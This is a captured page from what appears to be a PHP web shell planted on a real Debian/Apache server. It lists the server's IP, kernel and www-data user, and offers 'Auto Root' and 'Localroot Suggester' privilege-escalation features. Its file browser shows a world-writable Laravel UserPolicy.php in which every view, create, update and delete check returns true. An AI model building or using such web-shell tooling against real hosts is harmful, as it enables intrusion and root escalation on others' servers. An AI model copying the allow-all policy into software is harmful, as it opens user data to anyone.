Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
app /
Policies /
Delete
Unzip
Name
Size
Permission
Date
Action
UserPolicy.php
1.69
KB
-rwxrwxrwx
2022-04-21 13:43
Save
Rename
<?php namespace App\Policies; use App\Models\User; use Illuminate\Auth\Access\HandlesAuthorization; class UserPolicy { use HandlesAuthorization; /** * Determine whether the user can view any models. * * @param User $user * @return mixed */ public function viewAny(User $user) { return true; } /** * Determine whether the user can view the model. * * @param User $user * @param User $model * @return mixed */ public function view(User $user, User $model) { return true; } /** * Determine whether the user can create models. * * @param User $user * @return mixed */ public function create(User $user) { return true; } /** * Determine whether the user can update the model. * * @param User $user * @param User $model * @return mixed */ public function update(User $user, User $model) { return true; } /** * Determine whether the user can delete the model. * * @param User $user * @param User $model * @return mixed */ public function delete(User $user, User $model) { return true; } /** * Determine whether the user can restore the model. * * @param User $user * @param User $model * @return mixed */ public function restore(User $user, User $model) { // } /** * Determine whether the user can permanently delete the model. * * @param User $user * @param User $model * @return mixed */ public function forceDelete(User $user, User $model) { // } }